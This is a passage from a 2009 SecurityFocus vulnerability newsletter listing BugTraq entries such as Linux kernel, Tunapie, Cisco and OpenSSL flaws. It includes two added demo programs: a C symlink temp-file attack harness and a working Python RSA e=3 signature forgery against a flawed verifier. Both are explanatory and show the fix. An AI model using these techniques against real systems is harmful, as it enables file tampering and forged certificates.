Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/33836
Summary:
The Linux kernel is prone to multiple denial-of-service vulnerabilities when mapping memory addresses on SPARC-based computers.

Local attackers can leverage these issues to crash the kernel and deny service to legitimate users.

Versions prior to 2.6.25.4 are vulnerable.

84. Linux Kernel 'locks_remove_flock()' Local Race Condition Vulnerability
BugTraq ID: 33237
Remote: No
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/33237
Summary:
The Linux kernel is prone to a local race-condition vulnerability because it fails to properly handle POSIX locks.

A local attacker may exploit this issue to crash the computer or gain elevated privileges.

85. Linux Kernel 64 Bit ABI System Call Parameter Privilege Escalation Vulnerability
BugTraq ID: 33275
Remote: No
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/33275
Summary:
The Linux Kernel is prone to a local privilege-escalation vulnerability.

A local attacker may be able to exploit this issue to read or write to unintended address spaces. This may result in denial-of-service conditions, the disclosure of sensitive information, or privilege escalation.

This issue affects versions prior to Linux 2.6.28.6 on some 64-bit architectures, including s390, PowerPC, SPARC64, and MIPS. Additional architectures may also be affected.

86. Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
BugTraq ID: 34412
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34412
Summary:
The 'mod_jk' module for Apache Tomcat is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

This issue affects mod_jk 1.2.0 through 1.2.26.

87. Tunapie Stream URI Remote Command Execution Vulnerability
BugTraq ID: 34418
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34418
Summary:
Tunapie is prone to a remote command-execution vulnerability because it fails to perform adequate checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary commands in the context of the application. This may aid in further attacks.

Tunapie 2.1 is vulnerable; other versions may also be affected.

88. Tunapie Insecure Temporary File Creation Vulnerability
BugTraq ID: 34417
Remote: No
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34417
Summary:
Tunapie creates a temporary file in an insecure manner.

An attacker with local access could perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

This issue affects Tunapie 2.1; other versions may also be affected.
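
Added example, not Tunapie's code: the insecure temporary-file open the entry describes beside a safe replacement, with a harness that plants a symlink at a predictable name the way a local attacker would and reports whether the victim file survives. The scratch directory under /tmp and the file names are this example's assumptions.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* mkdtemp, symlink, O_NOFOLLOW */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Insecure pattern: a fixed, predictable name opened with O_TRUNC and with
 * symlinks followed. A planted link redirects the truncation and the write. */
int create_tmp_insecure(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Safe pattern when the program must pick the name itself: O_EXCL makes
 * open() fail if anything (regular file or symlink, dangling or not) already
 * exists at `path`, and O_NOFOLLOW refuses a link in the final component.
 * When any name will do, mkstemp(3) does the same with an unguessable name. */
int create_tmp_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Replay the attack in a private scratch directory: plant a symlink at the
 * predictable temp-file name pointing at a victim file, let `creator` open
 * and write to it, then check whether the victim kept its contents.
 * Returns 1 if the victim survived, 0 if it was overwritten, -1 on setup error. */
int victim_survives(int (*creator)(const char *))
{
    char dir[] = "/tmp/tmpfile-demo-XXXXXX";
    if (mkdtemp(dir) == NULL)
        return -1;

    char victim[512], planted[512];
    snprintf(victim,  sizeof victim,  "%s/victim.conf", dir);
    snprintf(planted, sizeof planted, "%s/app.tmp", dir);  /* predictable name */

    FILE *vf = fopen(victim, "w");
    if (vf == NULL) return -1;
    fputs("keep me\n", vf);
    fclose(vf);

    if (symlink(victim, planted) != 0) return -1;   /* attacker's move */

    int fd = creator(planted);                     /* application's move */
    if (fd >= 0) {
        ssize_t w = write(fd, "scratch\n", 8);
        (void)w;
        close(fd);
    }

    char back[32] = {0};
    FILE *rf = fopen(victim, "r");
    if (rf == NULL) return -1;
    size_t got = fread(back, 1, sizeof back - 1, rf);
    fclose(rf);
    back[got] = '\0';
    int survived = strcmp(back, "keep me\n") == 0;

    unlink(planted); unlink(victim); rmdir(dir);
    return survived;
}

int main(void)
{
    printf("insecure open: victim %s\n",
           victim_survives(create_tmp_insecure) == 1 ? "intact" : "overwritten");
    printf("safe open:     victim %s\n",
           victim_survives(create_tmp_safe) == 1 ? "intact" : "overwritten");
    return 0;
}
```

The harness uses a directory only the current user can reach, so it only demonstrates the file-system semantics; the real exposure is in a world-writable directory such as /tmp, where any local user can plant the link before the application runs.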

89. Lanius CMS 'upload.php' Arbitrary File Upload Vulnerability
BugTraq ID: 34415
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34415
Summary:
Lanius CMS (formerly known as Drake CMS) is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Versions prior to Lanius CMS 0.5.2 r1094 are vulnerable. Note that Drake CMS 0.4.6 and later versions are also vulnerable.

90. Cisco PIX and ASA Multiple Denial of Service, ACL Bypass, and Authentication Bypass Vulnerabilities
BugTraq ID: 34429
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34429
Summary:
Cisco PIX Security Appliance and ASA 5500 Series Adaptive Security Appliance are prone to multiple denial-of-service vulnerabilities, an ACL-bypass vulnerability, and an authentication-bypass vulnerability.

Remote attackers can exploit these issues to cause an affected device to reload, to force network traffic to bypass ACL rules, or to gain unauthorized access to an affected device. Successful exploits may facilitate further attacks.

These issues are documented by the following Cisco Bug IDs:

CSCsx47543 further documents the issue tracked by CVE-2009-1155.
CSCsv52239 further documents the issue tracked by CVE-2009-1156.
CSCsy22484 further documents the issue tracked by CVE-2009-1157.
CSCsx32675 further documents the issue tracked by CVE-2009-1158.
CSCsw51809 further documents the issue tracked by CVE-2009-1159.
CSCsq91277 further documents the issue tracked by CVE-2009-1160.

91. SASPCMS SQL Injection and Cross Site Scripting Vulnerabilities
BugTraq ID: 34430
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34430
Summary:
SASPCMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SASPCMS 0.9 is vulnerable; other versions may also be affected.

92. OpenGoo Cross Site Scripting And HTML Injection Vulnerabilities
BugTraq ID: 34428
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34428
Summary:
OpenGoo is prone to a cross-site scripting issue and an HTML-injection issue because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

OpenGoo 1.3 and 1.3.1 are vulnerable; other versions may be affected as well.

93. OpenAFS Unix Cache Manager Heap-Based Buffer Overflow Vulnerability
BugTraq ID: 34407
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34407
Summary:
OpenAFS is prone to a remote heap-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer in the Unix cache manager. The issue occurs when the application processes RX packets in a client context.

An attacker can exploit this issue to execute arbitrary code in the context of the Unix cache manager, resulting in a complete compromise of the affected computer. Failed exploit attempts will likely result in a denial of service.

The issue affects these versions:

OpenAFS Unix clients 1.0 through 1.4.8
OpenAFS Unix clients 1.5.0 through 1.5.58

Note that Mac OS X clients are not affected.

94. OpenAFS Error Codes Remote Denial of Service Vulnerability
BugTraq ID: 34404
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34404
Summary:
OpenAFS is prone to a denial-of-service vulnerability that affects client computers running the Linux kernel: a file server can return error codes that the Linux client's cache manager does not expect, and handling them triggers a kernel panic on the client.

Successfully exploiting this issue allows attackers to cause a kernel panic, denying service to legitimate users.

The issue affects these versions:

OpenAFS 1.0 through 1.4.8
OpenAFS 1.5.0 through 1.5.58

95. RETIRED: vBulletin Admin Control Panel Multiple HTML Injection Vulnerabilities
BugTraq ID: 34393
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34393
Summary:
vBulletin is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

vBulletin 3.8.0 RC2 is vulnerable; other versions may also be affected.

NOTE: This BID is being retired because an attacker must have administrative access to the application to exploit this issue. Therefore, no privileges are gained.

96. Little CMS Monochrome Profiles Null Pointer Dereference Denial of Service Vulnerability
BugTraq ID: 34411
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34411
Summary:
Little CMS is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue by tricking a victim into opening a specially crafted image file.

Successful attacks will cause the application using the affected engine to crash.

NOTE: Other applications that use Little CMS (such as Mozilla Firefox, OpenJDK, and GIMP) are likely vulnerable to this issue as well.

97. RETIRED: Little CMS Monochrome Profiles Null Pointer Dereference Denial of Service Vulnerability
BugTraq ID: 34420
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/34420
Summary:
Little CMS is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue by tricking a victim into opening a specially crafted image file.

Successful attacks will cause the application using the affected engine to crash.

Little CMS 1.18 is vulnerable; other versions may also be affected.

NOTE: Other applications that use Little CMS (such as Mozilla Firefox, OpenJDK, and GIMP) are likely vulnerable to this issue as well.

NOTE: This record is being retired because it is a duplicate of BID 34411 (Little CMS Monochrome Profiles Null Pointer Dereference Denial of Service Vulnerability).

98. OpenSSL PKCS Padding RSA Signature Forgery Vulnerability
BugTraq ID: 19849
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/19849
Summary:
OpenSSL is prone to a vulnerability that may allow an attacker to forge RSA signatures. When verifying a PKCS #1 v1.5 signature, affected versions check the leading 00 01 FF...FF 00 padding and the DigestInfo structure but do not require the DigestInfo to end exactly at the end of the recovered block, so any trailing bytes are ignored. When the RSA public exponent is small (3), an attacker can choose those trailing bytes so that the whole block is a perfect cube and take its integer cube root; the root is accepted as a valid signature without any knowledge of the private key.

An attacker may exploit this issue to forge signatures on digital certificates or RSA keys and take advantage of trust relationships that depend on these credentials, possibly posing as a trusted party.

All versions up to and including OpenSSL 0.9.7j and 0.9.8b are affected by this vulnerability. Updates are available.
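The forgery described above, as an added worked example; this is not code from the BID or from OpenSSL. It assumes a 2048-bit e = 3 key generated with a seeded RNG purely for reproducibility (demo only, not a real key generator) and SHA-256 DigestInfo. verify_flawed mirrors the shape of the pre-fix check (padding parsed from the front, bytes after the hash never examined) rather than reproducing OpenSSL's source; verify_strict is the corrected behaviour, which requires the recovered block to match the expected encoding byte for byte. The message and key are constructed here.

```python
import hashlib
import random

# DER-encoded DigestInfo prefix for SHA-256 (RFC 3447, section 9.2, note 1).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def _is_probable_prime(n, rng, rounds=32):
    """Miller-Rabin; adequate for a demo key, not a substitute for a real key generator."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def make_e3_keypair(bits=2048, seed=1):
    """Return (n, e, d) with e = 3. Seeded RNG for reproducibility: demo only."""
    rng, primes = random.Random(seed), []
    while len(primes) < 2:
        cand = rng.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        # e = 3 needs gcd(p - 1, 3) == 1, i.e. p must not be 1 mod 3.
        if cand % 3 != 1 and _is_probable_prime(cand, rng):
            primes.append(cand)
    p, q = primes
    return p * q, 3, pow(3, -1, (p - 1) * (q - 1))


def _emsa_pkcs1_v15(msg, k):
    """EMSA-PKCS1-v1_5 block: 00 01 FF..FF 00 DigestInfo || H(msg), exactly k bytes."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(msg, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(_emsa_pkcs1_v15(msg, k), "big"), d, n).to_bytes(k, "big")


def verify_flawed(msg, sig, n, e):
    """Pre-fix behaviour: walk the padding, compare DigestInfo || hash, ignore the rest."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= k or em[i] != 0x00:  # at least eight FF bytes, then the 00 separator
        return False
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t   # BUG: bytes after the hash are never examined


def verify_strict(msg, sig, n, e):
    """Fixed behaviour: the recovered block must equal the expected encoding byte for byte."""
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    return em == _emsa_pkcs1_v15(msg, k)


def _ceil_cbrt(x):
    """Smallest integer s with s**3 >= x."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge(msg, n):
    """Bleichenbacher's e = 3 forgery: needs only the public modulus, never d."""
    k = (n.bit_length() + 7) // 8
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + t
    # Minimal padding up front leaves k - len(prefix) bytes of "don't care" garbage at the end.
    block = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    s = _ceil_cbrt(block)
    # s**3 exceeds block by less than 3*s**2 + 3*s + 1, far smaller than the garbage region
    # for a 2048-bit modulus, so the prefix survives; s**3 < n, so no modular reduction occurs.
    assert s ** 3 < n and (s ** 3).to_bytes(k, "big").startswith(prefix)
    return s.to_bytes(k, "big")


if __name__ == "__main__":
    n, e, d = make_e3_keypair()
    msg = b"constructed message: an attacker-chosen certificate body"
    forged = forge(msg, n)
    print("flawed verifier accepts forgery:", verify_flawed(msg, forged, n, e))
    print("strict verifier accepts forgery:", verify_strict(msg, forged, n, e))
```

The forgery depends on the modulus being large relative to the hash: the attacker needs more "garbage" bits than roughly two thirds of the modulus length, which is why 2048-bit and larger e = 3 keys were the practical targets. The check that closes the hole is the one verify_strict performs: compare the full recovered block against the expected encoding, so that the DigestInfo must be the last thing in the block.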

99. Mozilla SeaMonkey/Thunderbird Newsgroup Cancel Message Handling Buffer Overflow Vulnerability
BugTraq ID: 31411
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/31411
Summary:
Mozilla SeaMonkey and Thunderbird are prone to a remote heap-based buffer-overflow vulnerability because they fail to properly bounds-check user-supplied data.

Successfully exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the vulnerable application; failed exploit attempts will likely crash the application. This may facilitate the remote compromise of affected computers.

The issue affects versions prior to Mozilla Thunderbird 2.0.0.17 and prior to Mozilla SeaMonkey 1.1.12.

100. Mozilla Firefox 2.0.0.14 Multiple Remote Vulnerabilities
BugTraq ID: 30038
Remote: Yes
Last Updated: 2009-04-08
Relevant URL: http://www.securityfocus.com/bid/30038
Summary:
The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox 2.0.0.14 and prior versions.

Exploiting these issues can allow attackers to:

- steal authentication credentials
- obtain potentially sensitive information
- violate the same-origin policy
- execute scripts with elevated privileges
- upload arbitrary files to affected computers
- cause denial-of-service conditions
- execute arbitrary code

Other attacks are also possible.

These issues are present in Firefox 2.0.0.14 and prior versions.

Mozilla Thunderbird is affected by the issues described in Mozilla advisories MFSA 2008-21, MFSA 2008-24, and MFSA 2008-25. Note that these issues arise in Thunderbird only when JavaScript is enabled. JavaScript is not enabled in the default installation.

III. SECURITYFOCUS NEWS ARTICLES
--------------------------------
1. Browsers bashed first in hacking contest
By: Robert Lemos
A security researcher keeps a vulnerability on ice for an entire year, before using it at the Pwn2Own contest to exploit Apple's browser. Microsoft's Internet Explorer 8 falls soon after.
http://www.securityfocus.com/news/11549

2. Experts: U.S. needs to defend its "cyber turf"
By: Robert Lemos
The United States must develop a Monroe Doctrine for the Internet, defining what constitutes its cyberspace and pledging to defend its virtual borders, security experts told Congress.
http://www.securityfocus.com/news/11548

3. Advisor: U.S. needs policy to defend cyberspace
By: Robert Lemos
An Obama transition-team member argues that any future cyber policy needs to deal with the role of the intelligence community, the militarization of cyberspace and designating a lead disaster agency.
http://www.securityfocus.com/news/11547

4. Cabal forms to fight Conficker, offers bounty
By: Robert Lemos
Microsoft offers $250,000 for information leading to the arrest of the author and, along with security firms and Internet service providers, pledges to work to prevent the prolific worm from spreading further.
http://www.securityfocus.com/news/11546

IV. SECURITY JOBS LIST SUMMARY
-------------------------------
V. INCIDENTS LIST SUMMARY
---------------------------
VI. VULN-DEV RESEARCH LIST SUMMARY
-----------------------------------
VII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. SecurityFocus Microsoft Newsletter #438
http://www.securityfocus.com/archive/88/502488

VIII. SUN FOCUS LIST SUMMARY
----------------------------
IX. LINUX FOCUS LIST SUMMARY
----------------------------
X. UNSUBSCRIBE INSTRUCTIONS
-----------------------------
To unsubscribe, send an e-mail message to sf-news-unsubscribe (at) securityfocus (dot) com from the subscribed address. The contents of the subject or message body do not matter. You will receive a confirmation request message that you must answer. Alternatively, you can visit http://www.securityfocus.com/newsletters and unsubscribe via the website.

If your email address has changed, email listadmin (at) securityfocus (dot) com and ask to be manually removed.

XI. SPONSOR INFORMATION
------------------------
This issue is sponsored by Red Hat

Putting open source to the test:The making of JBoss Enterprise Middleware

Through a rigorous productization process, JBoss Enterprise Middleware teams continually harden and transform cutting-edge open source technology into well-tempered enterprise software products with unsurpassed quality, performance, and stability - then deliver it with top-notch support and mission-critical SLAs. Here's how it's done.

http://dinclinx.com/Redirect.aspx?36;4756;20;189;0;1;259;ac28cb88c17443b5

Copyright 2010, SecurityFocus